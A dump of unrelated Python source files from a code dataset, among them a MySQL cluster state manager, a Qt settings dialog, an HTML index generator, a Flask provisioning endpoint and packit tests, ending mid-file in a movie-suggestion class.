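{"seq_id":"68235014","text":"#!/bin/python\n#from hyaline_state import *\nimport threading\n# from twitter.common import log\nfrom hyaline.scheduler.hyaline_scheduler import log\nimport time\nclass Enum(set):\n    def __getattr__(self, name):\n        if name in self:\n            return name\n        raise AttributeError\n\nNodestate = Enum([\"STAGING\",\"STAGING_FAILED\", \"STARTING\", \"STARTING_FAILED\", \"RUNNING\", \"STOPPING\", \"STOPPING_FAILED\", \"STOPPED\",\n                  \"PHYSICS_RESTORING\", \"PHYSICS_RESTORING_FAILED\", \"SERVICE_RESTORING\", \"SERVICE_RESTORING_FAILED\",\n                  \"DATA_RESTORING\", \"CHANGE_HOST_RESTORING\", \"CHANGE_HOST_RESTORING_FAILED\",\n                  \"DELETING\", \"DELETING_FAILED\", \"DELETED\", \"SHIFTDELETING\", \"SHIFTDELETED\",\n                  \"SERVICE_RESTORE_START\",\"CHANGE_HOST_RESTORE_START\",\"PHYSICS_RESTORE_START\",\n                  \"EXPANDING\",\"EXPANDING_FAILED\",\"CONTRACTING\",\"CONTRACTING_FAILED\"])\n#STARTING: node is starting\n#RUNNING: node is running normally\n#STOPPING: node is stopping; when it is done, nodestate will be STOPPED\n#STOPPED: node is already stopped, it can be started again.\n#SERVICE_RESTORING: node is restoring the mysql service in the original engine; if this operation succeeds, state will be DATA_RESTORING,\n#                   otherwise state will be WAITING_SERVICE_RESTORE or RESTORE_FAILED\n#DATA_RESTORING: node is restoring mysql data; if this operation succeeds, state will be RUNNING,\n#                otherwise state will be WAITING_SERVICE_RESTORE or RESTORE_FAILED\n#CHANGE_HOST_RESTORING:\n#RESTORE_FAILED: cannot restore node\n#DELETED: node is deleted and cannot be started again.\nClusterstate=Enum([\"INITIALIZING\", \"LAUNCHING\", \"INITIALIZING_FAILED\", \"STARTING\", \"STARTING_FAILED\", \"DELETING\",\n                   'DELETED', \"DELETING_FAILED\", \"RUNNING\", 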
\"RESTORE\", \"ADDINGNODE\", \"ADDINGNODE_FAILED\",\n \"STARTINGNODE\", \"STARTINGNODE_FAILED\", \"STOPPINGNODE\", \"STOPPINGNODE_FAILED\", \"DELETINGNODE\",\n \"DELETINGNODE_FAILED\", \"STOPPING\", \"STOPPING_FAILED\", \"STOPPED\", \"STOPNODE\",\"SHIFTDELETE\"])\n\n#INITIALIZING: cluster is starting, when cluster is created ,this will be set\n#ADD : cluster is adding a node ,the cluster can not be operated by others in this state.\n#DELETE: cluster is already deleted.\n#RUNNING : all node of this cluster is good running, when you want to operate cluster, this state should be changed.\n#RESTORE : some node of this cluster is not in the state of RUNNING\n\nclass Stateupdate(object):\n def __init__(self, mysqlcluster):\n self._cluster = mysqlcluster\n self._lock = threading.Lock()\n\n def nodestate_update(self, task_id, nodestate):\n with self._lock:\n cluster_name = self._cluster.name\n try:\n task = self._cluster.tasks[task_id]\n except KeyError:\n log.error(\"Task %s not in cluster %s\" % (task_id, self._cluster.name))\n return False\n task.count = 0\n previous_state = task.nodestate\n previous_clusterstate = self._cluster.clusterstate\n if previous_state == nodestate:\n return False\n task.nodestate = nodestate\n log.info(\"Update %s's nodestate from %s to %s. \" % (task_id, previous_state, nodestate))\n if self._cluster.clusterstate == Clusterstate.DELETING:\n if task.nodestate == Nodestate.DELETING_FAILED:\n self._cluster.clusterstate = Clusterstate.DELETING_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" %(cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n elif task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED]:\n task.nodestate = Nodestate.DELETED\n if self._cluster.clusterstate == Clusterstate.DELETINGNODE:\n if task.nodestate == Nodestate.DELETING_FAILED:\n self._cluster.clusterstate = Clusterstate.DELETINGNODE_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n elif previous_state in [Nodestate.DELETING,Nodestate.DELETED] \\\n and task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED]:\n task.nodestate = Nodestate.DELETED\n return True\n if self.is_delete():\n self._cluster.clusterstate = Clusterstate.DELETED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. 
\" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n if self._cluster.clusterstate in [Clusterstate.DELETING,Clusterstate.DELETING_FAILED,Clusterstate.DELETED]:\n return True\n\n if self._cluster.clusterstate == Clusterstate.STARTING_FAILED and task.nodestate == Nodestate.STOPPED:\n return True\n\n if self._cluster.clusterstate in [Clusterstate.INITIALIZING, Clusterstate.LAUNCHING] and self.is_initialfail():\n self._cluster.clusterstate = Clusterstate.INITIALIZING_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n if self._cluster.clusterstate == Clusterstate.ADDINGNODE and \\\n previous_state in [Nodestate.STAGING, Nodestate.STARTING] and task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED,\n Nodestate.STARTING_FAILED]:\n task.nodestate = Nodestate.STAGING_FAILED\n self._cluster.clusterstate = Clusterstate.ADDINGNODE_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n if self._cluster.clusterstate == Clusterstate.STARTINGNODE:\n if task.nodestate == Nodestate.STARTING_FAILED:\n self._cluster.clusterstate = Clusterstate.STARTINGNODE_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n if task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED]:\n for task2 in self._cluster.tasks.values():\n if task2.nodestate in [Nodestate.STAGING, Nodestate.STARTING]:\n return True\n\n if self._cluster.clusterstate == Clusterstate.STOPPINGNODE:\n if task.nodestate == Nodestate.STOPPING_FAILED:\n self._cluster.clusterstate = Clusterstate.STOPPINGNODE_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n elif task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED]:\n task.nodestate = Nodestate.STOPPED\n\n if self._cluster.clusterstate == Clusterstate.STARTING and self.is_starting_failed():\n self._cluster.clusterstate = Clusterstate.STARTING_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n if self._cluster.clusterstate == Clusterstate.STOPPING:\n if task.nodestate == Nodestate.STOPPING_FAILED:\n self._cluster.clusterstate = Clusterstate.STOPPIN_FAILED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. 
\" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n elif task.nodestate in Nodestate.SERVICE_RESTORING:\n task.nodestate = Nodestate.STOPPED\n\n if self.is_restore():\n self._cluster.clusterstate = Clusterstate.RESTORE\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n if self.is_stopped():\n self._cluster.clusterstate = Clusterstate.STOPPED\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n if previous_state == Nodestate.STOPPING and self.is_nodestop():\n self._cluster.clusterstate = Clusterstate.STOPNODE\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n if self.is_running():\n self._cluster.clusterstate = Clusterstate.RUNNING\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n if self.is_stopnode():\n self._cluster.clusterstate = Clusterstate.STOPNODE\n if self._cluster.clusterstate != previous_clusterstate:\n log.info(\"Update %s's clusterstate from %s to %s. \" % (\n cluster_name, previous_clusterstate, self._cluster.clusterstate))\n return True\n\n def clusterstate_upstate(self,clusterstate):\n with self._lock:\n previous_state = self._cluster.clusterstate\n if previous_state == clusterstate:\n return False\n self._cluster.clusterstate = clusterstate\n return True\n\n def is_running(self):\n for task in self._cluster.tasks.values():\n if task.nodestate in [Nodestate.DELETING,\n Nodestate.DELETED,\n Nodestate.DELETING_FAILED]:\n continue\n if task.nodestate != Nodestate.RUNNING:\n return False\n return True\n\n def is_stopnode(self):\n for task in self._cluster.tasks.values():\n if task.nodestate not in [Nodestate.RUNNING,\n Nodestate.STOPPED]:\n return False\n return True\n\n def is_delete(self):\n for task in self._cluster.tasks.values():\n if task.nodestate != Nodestate.DELETED:\n return False\n return True\n\n def is_restore(self):\n for task in self._cluster.tasks.values():\n if task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED,\n Nodestate.SERVICE_RESTORE_START,\n Nodestate.CHANGE_HOST_RESTORE_START,\n Nodestate.PHYSICS_RESTORE_START]:\n return True\n return False\n\n def is_starting_failed(self):\n for task in self._cluster.tasks.values():\n if task.nodestate == Nodestate.STARTING_FAILED:\n return True\n return False\n\n def is_initialfail(self):\n for task in self._cluster.tasks.values():\n if task.nodestate in [Nodestate.SERVICE_RESTORING,\n Nodestate.SERVICE_RESTORING_FAILED,\n Nodestate.DATA_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING,\n Nodestate.CHANGE_HOST_RESTORING_FAILED,\n Nodestate.PHYSICS_RESTORING,\n Nodestate.PHYSICS_RESTORING_FAILED,\n Nodestate.STARTING_FAILED]:\n task.nodestate = Nodestate.STARTING_FAILED\n return True\n return False\n\n def is_stopped(self):\n for task in self._cluster.tasks.values():\n if task.nodestate 
in [Nodestate.DELETING,\n Nodestate.DELETED,\n Nodestate.DELETING_FAILED]:\n continue\n if task.nodestate != Nodestate.STOPPED:\n return False\n return True\n\n def a_running(self):\n for task in self._cluster.tasks.values():\n if task.nodestate == Nodestate.RUNNING:\n return True\n return False\n\n\n def is_nodestop(self):\n if self.a_running():\n for task in self._cluster.tasks.values():\n if task.nodestate == Nodestate.RUNNING:\n continue\n if task.nodestate == Nodestate.STOPPING:\n return False\n if task.nodestate == Nodestate.STOPPED:\n return True\n return False\n else:\n return False\n\n\n\n\n\n\n\n","sub_path":"hyaline/scheduler/hyaline_state.py","file_name":"hyaline_state.py","file_ext":"py","file_size_in_byte":16519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"438619156","text":"from io import open\nfrom setuptools import find_packages, setup\n\nwith open('requirements.txt') as fp:\n install_requires = fp.read()\n\nsetup(\n name=\"tsvtools\",\n version=\"0.0.1\",\n author=\"\",\n author_email=\"qurator@sbb.spk-berlin.de\",\n description=\"neath\",\n long_description=open(\"README.md\", \"r\", encoding='utf-8').read(),\n long_description_content_type=\"text/markdown\",\n keywords='qurator',\n license='Apache License 2.0',\n url=\"https://github.com/qurator-spk/neath\",\n packages=find_packages(exclude=[\"*.tests\", \"*.tests.*\",\n \"tests.*\", \"tests\"]),\n install_requires=install_requires,\n entry_points={\n 'console_scripts': [\n \"extract-doc-links=tsvtools.cli:extract_document_links\",\n \"annotate-tsv=tsvtools.cli:annotate_tsv\",\n \"page2tsv=tsvtools.cli:page2tsv\",\n \"tsv2page=tsvtools.cli:tsv2page\",\n \"find-entities=tsvtools.cli:find_entities\",\n \"make-page2tsv-commands=tsvtools.cli:make_page2tsv_commands\"\n ]\n },\n python_requires='>=3.6.0',\n tests_require=['pytest'],\n classifiers=[\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"345907557","text":"from deposit.commander.dialogs._Dialog import (Dialog)\n\nfrom qgis.PyQt import (QtWidgets, QtCore, QtGui)\n\nclass LinkDB(Dialog):\n\t\n\tdef title(self):\n\t\t\n\t\treturn \"Link Database\"\n\t\n\tdef set_up(self):\n\t\t\n\t\tself.setMinimumWidth(600)\n\t\tself.setModal(True)\n\t\tself.layout = QtWidgets.QVBoxLayout()\n\t\tself.setLayout(self.layout)\n\t\t\n\t\tself.form_layout = QtWidgets.QFormLayout()\n\t\tself.form = QtWidgets.QWidget()\n\t\tself.form.setLayout(self.form_layout)\n\t\tself.layout.addWidget(self.form)\n\t\t\n\t\tself.db = self.model.datasources.DB()\n\t\tself.dbrel = self.model.datasources.DBRel()\n\t\tself.ds = None\n\t\t\n\t\tconnstrings = []\n\t\tfor row in self.view.menu.get_recent(): # [[url], [identifier, connstr], ...]\n\t\t\tif len(row) == 2:\n\t\t\t\tconnstrings.append(row[1])\n\t\t\n\t\tself.connstr = QtWidgets.QComboBox()\n\t\tif connstrings:\n\t\t\tself.connstr.addItems(connstrings)\n\t\tself.connstr.setEditable(True)\n\t\tself.connstr.currentTextChanged.connect(self.on_connstr_changed)\n\t\t\n\t\tself.identifier = QtWidgets.QListWidget()\n\t\t\n\t\tself.form_layout.addRow(\"Connect string:\", self.connstr)\n\t\tself.form_layout.addRow(\"Identifier:\", 
self.identifier)\n\t\t\n\t\tif connstrings:\n\t\t\tself.on_connstr_changed(connstrings[0])\n\t\n\tdef on_connstr_changed(self, connstr):\n\t\t\n\t\tself.identifier.clear()\n\t\tself.identifier.setEnabled(False)\n\t\tself.ds = None\n\t\tif connstr:\n\t\t\tif self.dbrel.set_connstr(connstr) and self.dbrel.is_valid():\n\t\t\t\tself.identifier.addItem(self.dbrel.get_identifier())\n\t\t\t\tself.ds = self.dbrel\n\t\t\t\treturn\n\t\t\t\n\t\t\tif self.db.set_connstr(connstr):\n\t\t\t\tidentifiers = self.db.get_identifiers()\n\t\t\t\tif identifiers:\n\t\t\t\t\tself.identifier.addItems(identifiers)\n\t\t\t\t\tself.identifier.setEnabled(True)\n\t\t\t\t\tself.ds = self.db\n\t\n\tdef process(self):\n\t\t\n\t\titem = self.identifier.currentItem()\n\t\tif item and item.isSelected():\n\t\t\tidentifier = item.text()\n\t\t\tif identifier and (self.ds is not None):\n\t\t\t\tif self.ds.identifier is None:\n\t\t\t\t\tself.ds.set_identifier(identifier)\n\t\t\t\tself.ds.link()\n\t\t\t\tself.view.menu.add_recent_db(self.ds.identifier, self.ds.connstr)\n\t\n\t","sub_path":"deposit/commander/dialogs/LinkDB.py","file_name":"LinkDB.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"334937958","text":"#!/usr/bin/python\n\n## build_html_index.py\n\nimport sys\nimport os\nimport glob\nimport time\n\n\nclass IndexPage():\n    html_Template = \"\"\"\n<html>\n\t<head>\n\t\t<title>%%Title%%</title>\n\t</head>\n\t<body>\n\t\t<h1>%%Title%%</h1>\n\t\t<h2>%%Title2%%</h2>\n\t\t<div>\n%%REPEAT%%\n\t\t\t<p><a href=\"%%DOCURL%%\">%%DOCName%%</a> - %%DOCTitle%% %%DOCDescr%%</p>\n%%REPEAT%%\n\t\t</div>\n\t\t<div>\n\t\t\tFor any questions please contact: <a href=\"%%ContactURL%%\">Response Geospatial Office</a>\n\t\t</div>\n\t</body>\n</html>
\n\t\"\"\"\n \n Title = \"FEMA Public Files\"\n Title2 = \"\"\n tokens = [\"DOCURL\",\"DOCName\", \"DOCTitle\", \"DOCDescr\"]\n Contact = ''\n ContactURL = ''\n\n def __init__(self, fHandle, pageTitle, contents):\n self.fH = fHandle\n self.Title = pageTitle\n self.contents = contents\n\n def writeHeader(self):\n d = self.html_Template.split(\"%%REPEAT%%\")[0]\n d = d.replace(\"%%Title%%\", self.Title)\n d = d.replace(\"%%Title2%%\", self.Title2)\n self.fH.write(d)\n\n def format_contents(self, data):\n if data[3]:\n d = {\"DOCURL\":data[0], \"DOCName\": data[0], \"DOCTitle\":data[1], \"DOCDescr\": '', \"isDir\":data[3]}\n else:\n d = {\"DOCURL\":data[0], \"DOCName\": data[0], \"DOCTitle\":data[1], \"DOCDescr\": \"created: \" + time.ctime(data[2]), \"isDir\":data[3]} \n return d\n \n def writeItems(self):\n rpt = self.html_Template.split(\"%%REPEAT%%\")[1]\n rep = \"\"\n for da in self.contents:\n if da[0] == 'index.html':\n continue\n d = self.format_contents(da)\n r = rpt\n for k in self.tokens:\n r = r.replace('%%'+k+'%%', d[k] or '')\n rep = rep + r\n self.fH.write(rep)\n\n def writeFooter(self):\n d = self.html_Template.split(\"%%REPEAT%%\")[-1]\n d = d.replace(\"%%Contact%%\", self.Contact)\n d = d.replace(\"%%ContactURL%%\", self.ContactURL)\n self.fH.write(d)\n\ndef get_dir_contents(srchPath):\n data = []\n parts = os.listdir(srchPath)\n for p in parts:\n pq = os.path.join(srchPath, p)\n isDir = os.path.isdir(pq)\n objTime = os.path.getmtime(pq)\n objTitle = ''\n data.append([p, objTitle, objTime, isDir])\n return data\n\ndef build_index_page(data, title, dirPath):\n with open(os.path.join(dirPath,'index.html'), 'wt') as indexFile:\n indexPage = IndexPage(indexFile, title, data)\n indexPage.writeHeader()\n indexPage.writeItems()\n \n indexPage.writeFooter()\n\ndef main(args):\n sDir = args[0] or './raw'\n p = get_dir_contents(sDir)\n build_index_page(p, args[1] or 'VIIRS Flooded Areas', sDir)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"pr_3d/build_html_index.py","file_name":"build_html_index.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"97870175","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSchames listing APIs\n\"\"\"\nimport logging\nimport importlib\nimport httplib\n\nfrom flask import Blueprint, current_app, url_for, abort, request, g\nfrom flask_restful import Api, Resource\n\nfrom driftconfig.util import get_drift_config\nfrom driftconfig.relib import create_backend, get_store_from_url\nfrom drift.core.extensions.jwt import jwt_not_required\n\nfrom drift.auth.jwtchecker import requires_roles\nfrom drift.core.extensions.schemachecker import simple_schema_request\n\nlog = logging.getLogger(__name__)\nbp = Blueprint(\"admin\", __name__)\napi = Api(bp)\n\nclass AdminProvisionAPI(Resource):\n\n no_jwt_check = [\"POST\"]\n\n #@requires_roles(\"service\")\n @simple_schema_request({\n \"provisioners\": {\"type\": \"array\", },\n }, required=[])\n def post(self):\n tenant_name = g.conf.tenant_name['tenant_name']\n tier_name = g.conf.tier['tier_name']\n\n # quick check for tenant state before downloading config\n if g.conf.tenant[\"state\"] != \"initializing\":\n abort(httplib.BAD_REQUEST, message=\"You can only provision tenants which are in state 'initializing'. 
Tenant '%s' is in state '%s'" % (tenant_name, g.conf.tenant["state"]))\n\n        args_per_provisioner = {}\n        if request.json:\n            for arg in request.json.get(\"provisioners\", []):\n                if \"provisioner\" not in arg or \"arguments\" not in arg:\n                    log.warning(\"Provisioner argument missing 'provisioner' or 'arguments'\")\n                    continue\n                args_per_provisioner[arg[\"provisioner\"]] = arg[\"arguments\"]\n\n        origin = g.conf.domain['origin']\n        ts = get_store_from_url(origin)\n        conf = get_drift_config(\n            ts=ts,\n            tenant_name=tenant_name,\n            tier_name=tier_name,\n            deployable_name=current_app.config['name']\n        )\n\n\n        if conf.tenant[\"state\"] != \"initializing\":\n            raise RuntimeError(\"Tenant unexpectedly found in state '%s': %s\" % (conf.tenant[\"state\"], conf.tenant))\n\n        resources = current_app.config.get(\"resources\")\n        for module_name in resources:\n            m = importlib.import_module(module_name)\n            if hasattr(m, \"provision\"):\n                provisioner_name = m.__name__.split('.')[-1]\n                log.info(\"Provisioning '%s' for tenant '%s' on tier '%s'\", provisioner_name, tenant_name, tier_name)\n\n                args = args_per_provisioner.get(provisioner_name, {})\n                m.provision(conf, args)\n\n        # Mark the tenant as ready\n        conf.tenant[\"state\"] = \"active\"\n\n        # Save out config\n        log.info(\"Saving config to %s\", origin)\n        origin_backend = create_backend(origin)\n        origin_backend.save_table_store(ts)\n\n        local_origin = 'file://~/.drift/config/' + g.conf.domain['domain_name']\n        log.info(\"Saving config to %s\", local_origin)\n        local_store = create_backend(local_origin)\n        local_store.save_table_store(ts)\n\n        # invalidate flask config\n        current_app.extensions['driftconfig'].refresh()\n\n        return \"OK\"\n\n\napi.add_resource(AdminProvisionAPI, \"/provision\")\n
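# a sketch of the expected request payload (added comment, not part of the\n# original module; the provisioner name below is illustrative):\n#   POST /provision\n#   {\"provisioners\": [{\"provisioner\": \"postgres\", \"arguments\": {...}}]}\n# each entry must carry both 'provisioner' and 'arguments' or it is skipped\n","sub_path":"drift/core/apps/provision/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"419925482","text":"# coding=utf-8\nfrom PyQt4 import QtGui, QtCore\nimport sys\nimport os\n\n\nclass widget(QtGui.QWidget):\n    def __init__(self):\n\n        super(widget, self).__init__()\n\n        # self.setWindowIcon()\n        self.setWindowTitle('Settings')\n\n        self.buildGUI()\n        self.setupConnections()\n\n    def buildGUI(self):\n        self.setFixedSize(600, 400)\n\n        self.mpd_ip1 = '127.0.0.1'\n        self.mpd_port1 = '6660'\n        self.tray_st = '1'\n\n        if \".settings.conf\" in os.listdir():\n            self.file = open('.settings.conf', 'r')\n            count = 0\n            for line in self.file:\n                if count == 0:\n                    self.mpd_ip1 = line[7:-1]\n                if count == 1:\n                    self.mpd_port1 = line[9:-1]\n                if count == 2:\n                    self.tray_st = line[5:6]\n                count += 1\n        self.button_accept = QtGui.QPushButton(self)\n        self.button_cancel = QtGui.QPushButton(self)\n\n        self.button_accept.setGeometry(430, 364, 70, 30)\n        self.button_accept.setText(\"Accept\")\n\n        self.button_cancel.setGeometry(510, 364, 70, 30)\n        self.button_cancel.setText(\"Cancel\")\n\n        self.qlist1 = QtGui.QListWidget(self)\n        self.qlist1.setGeometry(-1, -1, 200, 360)\n\n        self.qlist2 = QtGui.QListWidget(self)\n        self.qlist2.setGeometry(205, -1, 400, 360)\n\n        self.qlist1.addItem(\"General\")\n\n    def clearList(self):\n        self.qlist2.clear()\n\n    def items_for_general(self):\n        self.checkbox = QtGui.QListWidgetItem()\n        self.checkbox.setText(\n            \"Enable Tray\")\n        self.checkbox.setFlags(self.checkbox.flags() |\n                               QtCore.Qt.ItemIsUserCheckable)\n        self.checkbox.setCheckState(QtCore.Qt.Checked)\n        self.qlist2.addItem(self.checkbox)\n        self.tray_st = self.checkbox.checkState()\n\n        self.mpd_path = 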
QtGui.QListWidgetItem()\n        self.mpd_path.setText(self.mpd_ip1)\n        self.mpd_path.setFlags(self.mpd_path.flags() |\n                               QtCore.Qt.ItemIsEditable)\n        self.mpd_port = QtGui.QListWidgetItem()\n        self.mpd_port.setText(self.mpd_port1)\n        self.mpd_port.setFlags(self.mpd_port.flags() |\n                               QtCore.Qt.ItemIsEditable)\n        self.qlist2.addItem(self.mpd_path)\n        self.qlist2.addItem(self.mpd_port)\n\n    def itemClickedqlist1(self, item):\n        self.clearList()\n        if item.text() == \"General\":\n            self.items_for_general()\n\n    def setupConnections(self):\n        self.connect(self.qlist1,\n                     QtCore.SIGNAL(\"itemClicked(QListWidgetItem*)\"),\n                     self.itemClickedqlist1)\n        self.button_cancel.clicked.connect(self.cancel_action)\n        self.button_accept.clicked.connect(self.accept_action)\n\n    def cancel_action(self, event):\n        self.deleteLater()\n\n    def accept_action(self, event):\n        self.file = open('.settings.conf', 'w')\n        self.file.write(\"mpd_ip \" + str(self.mpd_path.text()) + \"\\n\")\n        self.file.write(\"mpd_port \" + str(self.mpd_port.text()) + \"\\n\")\n        if self.tray_st == 0:\n            self.file.write(\"tray 0\\n\")\n        else:\n            self.file.write(\"tray 1\\n\")\n        self.file.close()\n        self.deleteLater()\n\n\nif __name__ == \"__main__\":\n    qapp = QtGui.QApplication(sys.argv)\n    w = widget()\n    w.show()\n    sys.exit(qapp.exec_())\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"590506940","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 22 12:18:38 2020\r\n\r\n@author: Student\r\n\"\"\"\r\n\r\nc=int(input(\"Enter no. of rows:\" ))\r\nfor i in range(0,c):\r\n    if i==int(c/2):\r\n        print(\" \",end=\" \") \r\n        for i in range(0,c): \r\n            print(\"*\",end=\" \")\r\n        if i==c-1:\r\n            print()\r\n    else:\r\n        print(\" \"*c+\"*\") \r\n\r\n    ","sub_path":"python/module 3/pattern3.py","file_name":"pattern3.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"195758420","text":"\"\"\"\nE2E tests which utilize cockpit projects\n\"\"\"\nimport shutil\nfrom pathlib import Path\n\nimport pytest\nfrom flexmock import flexmock\n\nfrom packit.api import PackitAPI\nfrom packit.config import get_local_package_config\nfrom packit.distgit import DistGit\nfrom packit.fedpkg import FedPKG\nfrom packit.local_project import LocalProject\nfrom packit.utils import cwd\nfrom tests.spellbook import UP_COCKPIT_OSTREE, initiate_git_repo, get_test_config\n\n\n@pytest.fixture()\ndef cockpit_ostree(tmpdir):\n    t = Path(str(tmpdir))\n\n    u = t / \"up\"\n    shutil.copytree(UP_COCKPIT_OSTREE, u)\n    initiate_git_repo(u, tag=\"179\")\n\n    return u\n\n\ndef test_update_on_cockpit_ostree(cockpit_ostree):\n    def mocked_new_sources(sources=None):\n        if not Path(sources).is_file():\n            raise RuntimeError(\"archive does not exist\")\n\n    flexmock(FedPKG, init_ticket=lambda x=None: None, new_sources=mocked_new_sources)\n\n    flexmock(\n        DistGit,\n        push_to_fork=lambda *args, **kwargs: None,\n        is_archive_in_lookaside_cache=lambda archive_path: False,\n    )\n    flexmock(\n        PackitAPI,\n        push_and_create_pr=lambda pr_title, pr_description, dist_git_branch: None,\n    )\n\n    pc = get_local_package_config(str(cockpit_ostree))\n    up_lp = LocalProject(working_dir=str(cockpit_ostree))\n    c = get_test_config()\n\n    api = PackitAPI(c, pc, up_lp)\n    with cwd(cockpit_ostree):\n        api.sync_release(\n            \"master\",\n            use_local_content=False,\n            version=\"179\",\n            force_new_sources=False,\n            create_pr=True,\n        
)\n\n assert api.dg.download_upstream_archive().is_file()\n","sub_path":"tests/integration/test_using_cockpit.py","file_name":"test_using_cockpit.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"76421931","text":"# -*- coding: utf-8 -*-\nimport re\nfrom aiocache import cached\n\nfrom somali import aiorequests, config\n\n\nclass Movie:\n base_url = config.tmdb_url\n key = config.tmdb_key\n genre_id_to_quote = {\n 12: \"que tal uma aventura?\",\n 14: \"embarque em uma fantasia:\",\n 16: \"quer uma bela animação?\",\n 18: \"drama sempre cai bem:\",\n 27: \"é hora do terror:\",\n 28: \"experimente um pouco de ação:\",\n 35: \"relaxe com uma boa comédia:\",\n 36: \"você gosta de História?\",\n 37: \"bang bang! Reviva o faroeste:\",\n 53: \"reúna o pessoal pra esse suspense:\",\n 80: \"embarque nesse crime:\",\n 99: \"informe-se com esse documentário:\",\n 878: \"que tal um pouco de ficção científica?\",\n 9648: \"você gosta de um mistério?\",\n 10402: \"solte a voz com esse musical:\",\n 10749: \"mergulhe nesse romance:\",\n 10751: \"reúna a 